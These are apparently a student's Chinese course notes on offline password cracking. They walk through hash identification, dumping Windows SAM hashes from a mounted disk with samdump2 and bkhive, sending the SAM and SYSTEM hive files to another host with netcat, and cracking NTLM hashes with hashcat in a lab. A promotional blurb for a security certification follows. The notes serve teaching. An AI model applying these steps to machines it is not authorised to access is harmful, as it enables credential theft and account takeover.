【安全牛学习笔记】离线密码破解、离线密码破解-Hashcat
|
离线密码破解 优势 - 离线不会触发密码锁定机制 - 不会产生大量登录失败日志引起管理员注意 HASH识别工具 - hash-identifier - Hashid - 可能识别错误或无法识别 |
通过使用hashid或者Hash-Identifier这种工具来识别哈希类型
工具下载地址:
git clone https://github.com/psypanda/hashid.git
git clone https://github.com/Miserlou/Hash-Identifier.git
root@k:~/Hash-Identifier# ls
Hash_ID.py README.md
root@k:~/Hash-Identifier# chmod u+x Hash_ID.py //赋予执行权限
root@k:~/Hash-Identifier# python Hash_ID.py //打开Hashid
-------------------------------------------------------------------------
HASH: 5f4dcc3b5aa765d61d8327deb882cf99 //md5加密
Possible Hashs:
[+] MD5
[+] Domain Cashed Credentials . MD4(MD5($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
-------------------------------------------------------------------------
HASH: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 //shal加密
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
Least Possible Hashs:
[+] Tiger-160
[+] Haval-160
[+] RipeMD-160
[+] SHA-1(HMAC)
[+] Tiger-160(HMAC)
[+] RipeMD-160(HMAC)
[+] Haval-160(HMAC)
[+] SHA-1(MaNGOS)
[+] SHA-1(MaNGOS2)
[+] sha1($pass.$salt)
[+] sha1($salt.$pass)
[+] sha1($salt.md5($pass))
[+] sha1($salt.md5($pass).$salt)
[+] sha1($salt.sha1($pass))
[+] sha1($salt.sha1($salt.sha1($pass)))
[+] sha1($username.$pass)
[+] sha1($username.$pass.$salt)
[+] sha1(md5($pass))
[+] sha1(md5($pass).$salt)
[+] sha1(md5(sha1($pass)))
[+] sha1(sha1($pass))
[+] sha1(sha1($pass).$salt)
[+] sha1(sha1($pass).substr($pass,0,3))
[+] sha1(sha1($salt.$pass))
[+] sha1(sha1(sha1($pass)))
[+] sha1(strtolower($username).$pass)
-------------------------------------------------------------------------
root@K:~# hashid b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86
[+] SHA-512
[+] Whirlpool
[+] Salsa10
[+] Salsa20
[+] SHA3-512
[+] SKein-512
[+] Skein-1024(512)
oot@k:~/hashid# hashid 5f4dcc3b5aa765d61d8327deb882cf99
Analyzing '5f4dcc3b5aa765d61d8327deb882cf99'
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x
|
离线密码破解 Windows HASH获取工具 - 利用漏洞: Pwdump、fgdump、mimikatz、wce - 物理接触: samdump2 - Kali ISO 启动虚拟机 - mount /dev/sdal /mnt - cd /mnt/Windows/System32/config - samdump2 SYSTEM SAM -o sam.hash - 利用nc传输HASH |
win7 ip地址: 192.168.1.121
C:\net user w7 1234
命令完成成功!
root@kali:~# fdisk -l //查看分区
Disk /dev/sha: 80 GiB, 85899345920 bytes, 16772160 sectors
UNits: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes /512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklablel type: dos
Disk identifier: 0x6852cbef
Device Boot Start End Sectors Size ID Type
/dev/sdal * 2048 206847 204800 100M 7 HPFS/NTFS/exFAX
/dev/sda2 206848 16770111 167563264 79.9G 7 HPFS/NTFS/exFAX
Disk /dev/loop0: 2.4GB, 2556620800 bytes, 4993400 sectors
UNits: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes /512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
root@kali:~# mount /dev/sha2 /mnt/
root@kali:~# mount /dev/sha2 /media/
root@kali:~# cd /media/
root@kali:/media# ls
Boot bootmgr BOOTSECT.BAK grldr $RECUELE.BIN System volume Information
root@kali:/media# cd /mnt/
root@kali:/mnt# ls
Documents and Settings
pagefiles.sys
PerfLogs
root@kali:/mnt# cd /mnt/Windows/System32/config
root@kali:/mnt/Windows/System32/config# ls
root@kali:/mnt/Windows/System32/config# samdump2 SYSTEM SAM -o sam.hash
root@kali:/mnt/Windows/System32/config# cat sam.hash
*disbaled* Administrator:500:aad3b435b5140eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disbaled* Guest:501:aad3b435b5140eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
w7:1000:aad3b435b5140eeaad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6:::
root@K:~# nc -nvlp 3333
listeing on [any] 333...
connect to [192.168.1.117] from (UNKNOWN) [192.168.1.121] 56580
7ce21f17c0aee7fb9ceba532d0546ad6
↑
│利用nc监听传给它
│
root@kali:/mnt/Windows/System32/config# nc 192.168.1.117 333
7ce21f17c0aee7fb9ceba532d0546ad6
|
离线密码破解-----Hashcat 开源多线程密码破解工具 支持80多种加密算法破解 基于CPU的计算能力破解 六种模式 - 0 Straight: 字典破解 - 1 Combination: 将字典中密码进行组合(1 2 > 11 22 12 21) - 2 Toggle case: 尝试字典中所有密码的大小写字母组合 - 3 Brute force: 指定字符集(或全部字符集)所有组合 - 4 Permutation: 字典中密码的全部字符置换组合(12 21) - 5 Table-lookup: 程序为字典中所有密码自动生成掩码 |
GPU破解神器Hashcat使用简介
ccSec · 2013/09/30 20:13
0x00 背景
目前GPU的速度越来越快,使用GPU超强的运算速度进行暴力密码破解也大大提高了成功率,曾经看到老外用26块显卡组成的分布式破解神器让我羡慕不已。要说目前最好的GPU破解HASH的软件,非HashCat莫属了。下面我就为大家具体介绍一下HashCat系列软件。
0x01 所需硬件及系统平台
HashCat系列软件在硬件上支持使用CPU、NVIDIA GPU、ATI GPU来进行密码破解。在操作系统上支持Windows、Linux平台,并且需要安装官方指定版本的显卡驱动程序,如果驱动程序版本不对,可能导致程序无法运行。
如果要搭建多GPU破解平台的话,最好是使用Linux系统来运行HashCat系列软件,因为在windows下,系统最多只能识别4张显卡。并且,Linux下的VisualCL技术(关于如何搭建VisualCL环境,请参考官方文档http://hashcat.net/wiki/doku.php?id=vcl_cluster_howto),可以轻松的将几台机器连接起来,进行分布式破解作业。 在破解速度上,ATI GPU破解速度最快,使用单张HD7970破解MD5可达到9000M/s的速度,其次为NVIDIA显卡,同等级显卡GTX690破解速度大约为ATI显卡的三分之一,速度最慢的是使用CPU进行破解。
0x02 HashCat软件简介
HashCat主要分为三个版本:Hashcat、oclHashcat-plus、oclHashcat-lite。这三个版本的主要区别是:HashCat只支持CPU破解。oclHashcat-plus支持使用GPU破解多个HASH,并且支持的算法高达77种。oclHashcat-lite只支持使用GPU对单个HASH进行破解,支持的HASH种类仅有32种,但是对算法进行了优化,可以达到GPU破解的最高速度。如果只有单个密文进行破解的话,推荐使用oclHashCat-lite。
目前最新的软件版本为HashCat v0.46、oclHashcat-plus v0.15、oclHashcat-lite v0.15。但是经过一段时间的测试,发现有时候版本越高,速度越慢。所以推荐在使用没有问题的情况下,无需升级到最新版本。根据测试,oclHashcat-lite v0.10的运算速度比v0.15的运算速度快20%,所以单个密文破解还是推荐使用oclHashcat-lite v0.10。
root@k:~# hashcat -h
hashcat, advanced password recovery
Usage: hashcat [options] hashfile [mask|wordfiles|directories]
=======
Options
=======
* General:
-m, --hash-type=NUM Hash-type, see references below
-a, --attack-mode=NUM Attack-mode, see references below
-V, --version Print version
-h, --help Print help
--quiet Suppress output
* Benchmark:
-b, --benchmark Run benchmark
* Misc:
--hex-salt Assume salt is given in hex
--hex-charset Assume charset is given in hex
--runtime=NUM Abort session after NUM seconds of runtime
--status Enable automatic update of the status-screen
--status-timer=NUM Seconds between status-screen update
--status-automat Display the status view in a machine readable format
* Files:
-o, --outfile=FILE Define outfile for recovered hash
--outfile-format=NUM Define outfile-format for recovered hash, see references below
--outfile-autohex-disable Disable the use of $HEX[] in output plains
-p, --separator=CHAR Define separator char for hashlists/outfile
--show Show cracked passwords only (see --username)
--left Show uncracked passwords only (see --username)
--username Enable ignoring of usernames in hashfile (Recommended: also use --show)
--remove Enable remove of hash once it is cracked
--stdout Stdout mode
--potfile-disable Do not write potfile
--debug-mode=NUM Defines the debug mode (hybrid only by using rules), see references below
--debug-file=FILE Output file for debugging rules (see --debug-mode)
-e, --salt-file=FILE Salts-file for unsalted hashlists
* Resources:
-c, --segment-size=NUM Size in MB to cache from the wordfile
-n, --threads=NUM Number of threads
-s, --words-skip=NUM Skip number of words (for resume)
-l, --words-limit=NUM Limit number of words (for distributed)
* Rules:
-r, --rules-file=FILE Rules-file use: -r 1.rule
-g, --generate-rules=NUM Generate NUM random rules
--generate-rules-func-min=NUM Force NUM functions per random rule min
--generate-rules-func-max=NUM Force NUM functions per random rule max
--generate-rules-seed=NUM Force RNG seed to NUM
* Custom charsets:
-1, --custom-charset1=CS User-defined charsets
-2, --custom-charset2=CS Example:
-3, --custom-charset3=CS --custom-charset1=?dabcdef : sets charset ?1 to 0123456789abcdef
-4, --custom-charset4=CS -2 mycharset.hcchr : sets charset ?2 to chars contained in file
* Toggle-Case attack-mode specific:
--toggle-min=NUM Number of alphas in dictionary minimum
--toggle-max=NUM Number of alphas in dictionary maximum
* Mask-attack attack-mode specific:
--increment Enable increment mode
--increment-min=NUM Start incrementing at NUM
--increment-max=NUM Stop incrementing at NUM
* Permutation attack-mode specific:
--perm-min=NUM Filter words shorter than NUM
--perm-max=NUM Filter words larger than NUM
* Table-Lookup attack-mode specific:
-t, --table-file=FILE Table file
--table-min=NUM Number of chars in dictionary minimum
--table-max=NUM Number of chars in dictionary maximum
* Prince attack-mode specific:
--pw-min=NUM Print candidate if length is greater than NUM
--pw-max=NUM Print candidate if length is smaller than NUM
--elem-cnt-min=NUM Minimum number of elements per chain
--elem-cnt-max=NUM Maximum number of elements per chain
--wl-dist-len Calculate output length distribution from wordlist
--wl-max=NUM Load only NUM words from input wordlist or use 0 to disable
--case-permute For each word in the wordlist that begins with a letter
generate a word with the opposite case of the first letter
==========
References
==========
* Outfile formats:
1 = hash[:salt]
2 = plain
3 = hash[:salt]:plain
4 = hex_plain
5 = hash[:salt]:hex_plain
6 = plain:hex_plain
7 = hash[:salt]:plain:hex_plain
8 = crackpos
9 = hash[:salt]:crackpos
10 = plain:crackpos
11 = hash[:salt]:plain:crackpos
12 = hex_plain:crackpos
13 = hash[:salt]:hex_plain:crackpos
14 = plain:hex_plain:crackpos
15 = hash[:salt]:plain:hex_plain:crackpos
* Debug mode output formats (for hybrid mode only, by using rules):
1 = save finding rule
2 = save original word
3 = save original word and finding rule
4 = save original word, finding rule and modified plain
* Built-in charsets:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff
* Attack modes:
0 = Straight
1 = Combination
2 = Toggle-Case
3 = Brute-force
4 = Permutation
5 = Table-Lookup
8 = Prince
* Hash types:
0 = MD5
10 = md5($pass.$salt)
20 = md5($salt.$pass)
30 = md5(unicode($pass).$salt)
40 = md5($salt.unicode($pass))
50 = HMAC-MD5 (key = $pass)
60 = HMAC-MD5 (key = $salt)
100 = SHA1
110 = sha1($pass.$salt)
120 = sha1($salt.$pass)
130 = sha1(unicode($pass).$salt)
140 = sha1($salt.unicode($pass))
150 = HMAC-SHA1 (key = $pass)
160 = HMAC-SHA1 (key = $salt)
200 = MySQL323
300 = MySQL4.1/MySQL5
400 = phpass, MD5(Wordpress), MD5(phpBB3), MD5(Joomla)
500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
900 = MD4
1000 = NTLM
1100 = Domain Cached Credentials (DCC), MS Cache
1400 = SHA256
1410 = sha256($pass.$salt)
1420 = sha256($salt.$pass)
1430 = sha256(unicode($pass).$salt)
1431 = base64(sha256(unicode($pass)))
1440 = sha256($salt.unicode($pass))
1450 = HMAC-SHA256 (key = $pass)
1460 = HMAC-SHA256 (key = $salt)
1600 = md5apr1, MD5(APR), Apache MD5
1700 = SHA512
1710 = sha512($pass.$salt)
1720 = sha512($salt.$pass)
1730 = sha512(unicode($pass).$salt)
1740 = sha512($salt.unicode($pass))
1750 = HMAC-SHA512 (key = $pass)
1760 = HMAC-SHA512 (key = $salt)
1800 = SHA-512(Unix)
2400 = Cisco-PIX MD5
2410 = Cisco-ASA MD5
2500 = WPA/WPA2
2600 = Double MD5
3200 = bcrypt, Blowfish(OpenBSD)
3300 = MD5(Sun)
3500 = md5(md5(md5($pass)))
3610 = md5(md5($salt).$pass)
3710 = md5($salt.md5($pass))
3720 = md5($pass.md5($salt))
3800 = md5($salt.$pass.$salt)
3910 = md5(md5($pass).md5($salt))
4010 = md5($salt.md5($salt.$pass))
4110 = md5($salt.md5($pass.$salt))
4210 = md5($username.0.$pass)
4300 = md5(strtoupper(md5($pass)))
4400 = md5(sha1($pass))
4500 = Double SHA1
4600 = sha1(sha1(sha1($pass)))
4700 = sha1(md5($pass))
4800 = MD5(Chap), iSCSI CHAP authentication
4900 = sha1($salt.$pass.$salt)
5000 = SHA-3(Keccak)
5100 = Half MD5
5200 = Password Safe SHA-256
5300 = IKE-PSK MD5
5400 = IKE-PSK SHA1
5500 = NetNTLMv1-VANILLA / NetNTLMv1-ESS
5600 = NetNTLMv2
5700 = Cisco-IOS SHA256
5800 = Android PIN
6300 = AIX {smd5}
6400 = AIX {ssha256}
6500 = AIX {ssha512}
6700 = AIX {ssha1}
6900 = GOST, GOST R 34.11-94
7000 = Fortigate (FortiOS)
7100 = OS X v10.8+
7200 = GRUB 2
7300 = IPMI2 RAKP HMAC-SHA1
7400 = sha256crypt, SHA256(Unix)
7900 = Drupal7
8400 = WBB3, Woltlab Burning Board 3
8900 = scrypt
9200 = Cisco $8$
9300 = Cisco $9$
9800 = Radmin2
10000 = Django (PBKDF2-SHA256)
10200 = Cram MD5
10300 = SAP CODVN H (PWDSALTEDHASH) iSSHA-1
11000 = PrestaShop
11100 = PostgreSQL Challenge-Response Authentication (MD5)
11200 = MySQL Challenge-Response Authentication (SHA1)
11400 = SIP digest authentication (MD5)
99999 = Plaintext
* Specific hash types:
11 = Joomla < 2.5.18
12 = PostgreSQL
21 = osCommerce, xt:Commerce
23 = Skype
101 = nsldap, SHA-1(Base64), Netscape LDAP SHA
111 = nsldaps, SSHA-1(Base64), Netscape LDAP SSHA
112 = Oracle S: Type (Oracle 11+)
121 = SMF > v1.1
122 = OS X v10.4, v10.5, v10.6
123 = EPi
124 = Django (SHA-1)
131 = MSSQL(2000)
132 = MSSQL(2005)
133 = PeopleSoft
141 = EPiServer 6.x < v4
1421 = hMailServer
1441 = EPiServer 6.x > v4
1711 = SSHA-512(Base64), LDAP {SSHA512}
1722 = OS X v10.7
1731 = MSSQL(2012 & 2014)
2611 = vBulletin < v3.8.5
2612 = PHPS
2711 = vBulletin > v3.8.5
2811 = IPB2+, MyBB1.2+
3711 = Mediawiki B type
3721 = WebEdition CMS
7600 = Redmine Project Management Web App
root@k:~# echo 7ce21f17c0aee7fb9ceba532d0546ad6 >sam.hash
root@k:~# hachcat -m 100 sam.hash pass.lst
|
离线密码破解-----Hashcat 命令 - hashcat -b - hashcat -m 100 hash.dump pass.lst - hashcat -m 0 hash.txt -a 3 ?|?|?|?|?|?|?|?|?d?d - 结果: hashcat.pot - hashcat -m 100 -a 3 sam.hash -i --increment-min 6 --increment-max 8 ?|?|?|?|?|?|?|?| - ?| = abcdefghijklmnopqrstuvwxyz - ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ - ?d = 0123456789 - ?s = !"#$%&'()*+,-./:;<=>?@[\]^-`{|}~ - ?a = ?|?u?d?s - ?b = 0x00 - 0xff |
root@k:~# hashcat -b
Initializing hashcat v2.00 with 1 threads and 32mb segment-size...
Device...........: Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz
Instruction set..: x86_64
Number of threads: 1
Hash type: MD4
Speed/sec: 15.88M words
Hash type: MD5
Speed/sec: 12.96M words
Hash type: SHA1
Speed/sec: 9.28M words
Hash type: SHA256
Speed/sec: 4.65M words
Hash type: SHA512
Speed/sec: 1.94M words
Hash type: SHA-3(Keccak)
Speed/sec: 2.15M words
Hash type: GOST R 34.11-94
Speed/sec: 946.71k words
Hash type: SHA-1(Base64), nsldap, Netscape LDAP SHA
Speed/sec: 8.58M words
Hash type: SSHA-1(Base64), nsldaps, Netscape LDAP SSHA
Speed/sec: 8.21M words
Hash type: md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
Speed/sec: 13.21k words
Hash type: sha256crypt, SHA256(Unix)
Speed/sec: 602 words
Hash type: sha512crypt, SHA512(Unix)
Speed/sec: 382 words
Hash type: bcrypt, Blowfish(OpenBSD)
Speed/sec: 818 words
Hash type: NTLM
Speed/sec: 14.27M words
Hash type: Domain Cached Credentials (DCC), MS Cache
Speed/sec: 8.25M words
Hash type: NetNTLMv1-VANILLA / NetNTLMv1+ESS
Speed/sec: 13.82M words
Hash type: NetNTLMv2
Speed/sec: 2.09M words
root@k:~# hashcat -m 0 hash.txt -a 3 ?d?d?d?d
nitializing hashcat v2.00 with 1 threads and 32mb segment-size...
Added hash from file sam.hash: 1 (1 salts)
Activating quick-digest mode for single hash
7ce21f17c0aee7fb9ceba532d0546ad6:1234
All hashed have been recovered
Input.Mode: Mask (?d?d?d?d) [4]
Index.....: O/I (segment), 1000 (words), 0 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed sec.: -plains, 9.31k words
Progress..: 9324/10000 (93.24%)
Running...: 00:00:00:01
Estimated.: --:--:--:--:
Started Fri Apr 22 00:31:47 2016
Stopped Fri Apr 22 00:31:47 2016
root@k:~# hashcat -m 100 -a 3 sam.hash -i --increment-min 1 --increment-max 5 ?d
Initializing hashcat v2.00 with 1 threads and 32mb segment-size...
Added hash from file sam.hash: 1 (1 salts)
Activating quick-digest mode for single hash
[s]tatus [p]ause [c]esume [b]ypas [q]uit =>
Input.Mode: Mask (?d) [1]
Index.....: O/I (segment), 10 (words), 0 (bytes)
Recovered.: O/I hashes, O/I salts
Speed sec.: -plains, - words
Progress..: 10/10 (100.00%)
Running...: --:--:--:--:
Estimated.: --:--:--:--:
[s]status [p]uase [r]esume [b]ypass [q]uit => '
Started Fri Apr 22 00:31:47 2016
Stopped Fri Apr 22 00:31:47 2016
|
离线密码破解 Syskey工具 - 使用Bootkey利用RC4算法加密SAM数据库 - Bootkey保存于SYSTEM文件中 - Bkhive 从SYSTEM文件章提取bootkey Kali 2.0抛弃了bkhive 编译安装: http://http.us.debian.org/debian/pool/main/b/bkhive/ bkhive SYSTEM key samdump2 SAM key (版本已更新,不再支持此功能) - 建议使用Kali 1.x |
root@k:~# mount /dev/sha2 /mnt/
root@K:/mnt# cd /mnt/Windows/System32/config
root@k:/mnt/Windows/System32/config# ls
root@k:/mnt/Windows/System32/config# samdump2 SYSTEM SAM -o sam.hash
root@k:/mnt/Windows/System32/config# cat sam.hash
*disbaled* Administrator:500:aad3b435b5140eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disbaled* Guest:501:aad3b435b5140eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
w7:1000:aad3b435b5140eeaad3b435b51404ee:91d0a3767644eea90922f597bde98aae::
root@k:~# hash-identifier
-------------------------------------------------------------------------
HASH: 91d0a3767644eea90922f597bde98aae
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
-------------------------------------------------------------------------
HASH: ^CTraceback (most recent call last):
File "/usr/bin/hash-identifier", line 556, in <module>
hash = raw_input(" HASH: ")
KeyboardInterrupt
root@k:~# echo 91d0a3767644eea90922f597bde98aae > sam1.hash
root@k:~# hashcat -m 1000 sam1.hash pass.lst
Initializing hashcat v2.00 with 1 threads and 32mb segment-size...
Added hash from file sam.hash: 1 (1 salts)
Activating quick-digest mode for single hash
[s]tatus [p]ause [c]esume [b]ypas [q]uit =>
Input.Mode: Mask (pass.lst)
Index.....: O/I (segment),499 (words), 639632 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed sec.: - plains, - words
Progress..: 4999/4999 (93.24%)
Running...: --:--:--:--:
Estimated.: --:--:--:--:
Started Fri Apr 22 00:31:47 2016
Stopped Fri Apr 22 00:31:47 2016
root@k:~# hashcat -m 1000 -a 3 sam1.hash -i --increment-min 4 --increment-max 6 ?a?a?a?a?a?a
Initializing hashcat v2.00 with 1 threads and 32mb segment-size...
Added hash from file sam.hash: 1 (1 salts)
Activating quick-digest mode for single hash
[s]tatus [p]ause [c]esume [b]ypas [q]uit =>
Input.Mode: Mask (a?a?a?a?) [4]
Index.....: O/I (segment),499 (words), 639632 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed sec.: 9.43M plains, 9.43M words
Progress..: 81450625/81450625 (100.0%)
Running...: 00:00:00:09
Estimated.: --:--:--:--:
......
Started Fri Apr 22 00:31:47 2016
Stopped Fri Apr 22 00:31:47 2016
root@k:~/Downloads# tar zxvf bkhive_1.1.1.orig.tar.gz
bkhive-1.1.1/
bkhive-1.1.1/Makefile
bkhive-1.1.1/README
bkhive-1.1.1/bkhive.1
bkhive-1.1.1/hive.h
bkhive-1.1.1/bkhive.c
bkhive-1.1.1/AUTHORS
bkhive-1.1.1/ChangeLog
bkhive-1.1.1/COPYING
bkhive-1.1.1/Makefile.win32
bkhive-1.1.1/hive.c
root@k:~/Downloads# cd bkhive-1.1.1/
root@k:~/Downloads/bkhive-1.1.1# apt-get install libssl
libssl1.0.2 libssl-dev libssl-ocaml
libssl1.0.2-dbg libssl-doc libssl-ocaml-dev
root@k:~/Downloads/bkhive-1.1.1# apt-get install libssl-dev
root@k:~/Downloads/bkhive-1.1.1# make
/usr/bin/gcc -c -o bkhive.o bkhive.c
/usr/bin/gcc -c -o hive.o hive.c
/usr/bin/gcc -o bkhive hive.o bkhive.o
###############################################################
Bkhive 1.0.0 : extract Syskey bootkey from the system hive file
Copyright (C) 2004-2005 Nicola Cuomo <ncuomo@studenti.unina.it>
Distributed under terms of GNU General Public License version 2
###############################################################
root@k:~/Downloads/bkhive-1.1.1# make install
###############################################################
Bkhive 1.0.0 : extract Syskey bootkey from the system hive file
Copyright (C) 2004-2005 Nicola Cuomo <ncuomo@studenti.unina.it>
Distributed under terms of GNU General Public License version 2
###############################################################
Cresting directories...
/usr/bin/install -d -m 755 -o root -g root /usr/local/bin
/usr/bin/install -d -m 755 -o root -g root /usr/local/share/man.man1
Copying binary...
/usr/bin/install bkhive -m 755 -o root -g root /usr/local/bin
Installing man page...
/usr/bin/install bkhive.1 -m 644 -o root -g root /usr/local/share/man/man1
root@k:~/Downloads/bkhive-1.1.1# apt-get install libssl-dev
Reading package lists... Done
Building dependency tree
Reading state informatiion... Done
libssl-dev is already the newest version (1.0.2g-1).
You might want to run 'apt-get -f install' to correct thest:
The following packages have unmet dependencies:
samdump2 : Depends: libssl1.0.0 (>= 1.0.0) but it is not installable
Recommends: bkhive but it is not going to be insalled
E: Unment dependencies. Try 'apt-get -f install' with no packages (or specify a solution).
root@k:~/Downloads/bkhive-1.1.1# apt-get -f install
Reading package lists... Done
Building dependency tree
Reading state informatiion... Done
Correcting dependencies... Done
The following additional package will be installed:
samdump2
The following packages will be upgraded:
samdump2
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
1 not fully installed or removed.
Need to get 0 B/16.6 kb of archives.
After this operation, 2,048 B of additional disk space will be used.
Do you want to continue? [Y/n]
Reading changelogs... Done
(Reading database... 418766 files and directories currently installed.)
Preparing to unpack .../samdump2_3.0.0-3+b1_amd64.deb ...
Unpacking samdump2 (3.0.0-3+bl) over (1.1.1-1.1) ...
Processing triggers for man-db (2.7-5.1)...
Setting up samdump2 (3.0.0-3+b1) ...
root@k:~/Downloads/bkhive-1.1.1# apt-get purge samdump2 //卸载samdump2
Reading package lists... Done
Building dependency tree
Reading state informatiion... Done
The following additional package will be installed:
samdump2*
1 upgraded, 0 newly installed, 1 to remove and 0 not upgraded.
After this operation, 43.0 kb disk space will be freed.
Do you want to continue? [Y/n]
(Reading database... 418766 files and directories currently installed.)
Removin samdump2 (3.0.0-3+b1)
Processing triggers for man-db (2.7-5.1)..
root@k:~/Downloads/bkhive-1.1.1# apt-get install libssl-dev
Reading package list... Done
Building dependency tree
Reading state information... Done
libssl-dev is already the newest version (1.0.2g-1).
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@k:~/Downloads/bkhive-1.1.1# bkhive
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author : ncuomo@tudenti.unina.it
Usage:
bkhive systemhive keyfile
root@k:~/Downloads/bkhive-1.1.1# nc -nvlp 333 > SYSTEM
root@kali:~# nc 192.168.1.117 333 < SYSTEM -q 1
root@k:~/Downloads/bkhive-1.1.1# nc -nvlp 333 > SAM
root@kali:~# nc 192.168.1.117 333 < SAM -q 1
root@k:~/Downloads/bkhive-1.1.1# bkhive SYSTEM bkry
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author : ncuomo@tudenti.unina.it
Root Key : CMI-CreateHie{2A7FB991-7BBE-4F9D-B91E-7CB51D4737F5}
Default ControlSet: 001
Bootkey: 7ccc5d2742c91350cadc092c20cb5e8f
root@k:~/Downloads/bkhive-1.1.1# cat bk
bkhive bkhive.1 bkhive.c bkhive.o bkry
root@k:~/Downloads/bkhive-1.1.1# cat bkry
root@k:~/Downloads/bkhive-1.1.1# mv bkry key
root@k:~/Downloads/bkhive-1.1.1# apt-get install samdump2
root@k:~/Downloads/bkhive-1.1.1# samdump2 SAM key
该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂
Security+认证为什么是互联网+时代最火爆的认证?
牛妹先给大家介绍一下Security+
Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。
通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。
Security+认证如此火爆的原因?
原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。
